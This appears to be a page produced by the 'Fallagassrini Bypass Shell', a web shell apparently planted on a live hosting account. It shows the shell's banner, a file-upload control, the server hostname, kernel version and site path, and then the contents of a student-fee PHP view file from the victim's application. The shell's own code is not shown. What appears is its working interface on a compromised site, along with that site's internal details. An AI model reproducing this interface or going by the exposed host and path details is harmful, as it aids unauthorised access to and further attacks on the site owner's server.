? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/futuredraft/application/views/student/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/futuredraft/application/views/student/student_details.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
?>
<tr>
    <td>
        <input style="width:15px;" type="checkbox" id="select_student<?=$index?>" name="select_student<?=$index?>" checked  />   
        <input name="student_class_id<?=$index?>" id="student_class_id<?=$index?>" value="<?=$student_class_id?>" type="hidden"/>
    </td>
    <td>
        <?=$viewinfo->first_name.' '.$viewinfo->last_name?>
        <input type="hidden" id="student_id<?=$index?>" name="student_id<?=$index?>" value="<?= $viewinfo->student_id ?>"/>
    </td>
    <td>
        <?=$viewinfo->reg_no;?>
    </td>
     <td>
        <?=$viewinfo->gender;?>
    </td>
    
    <td>
        <select name="fee_type<?=$index?>" id="fee_type<?=$index?>" class="required">
            <option value="">Select</option>
            <?php foreach ($fee as $value) {
                echo '<option value="'.$value['fee_term_id'].'">'.$value['fee_term_type'].'</option>';
            }?>
            
        </select>        
    </td>    
    <td>
        <input class="required auto " type="text" name="register_fee<?=$index?>" id="register_fee<?=$index?>"/>
    </td>
</tr>


<script type="text/javascript">
    $(document).ready(function()
    {
       $("input.auto").css('text-align', 'right');
        $('input.auto').autoNumeric();
    });

</script>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net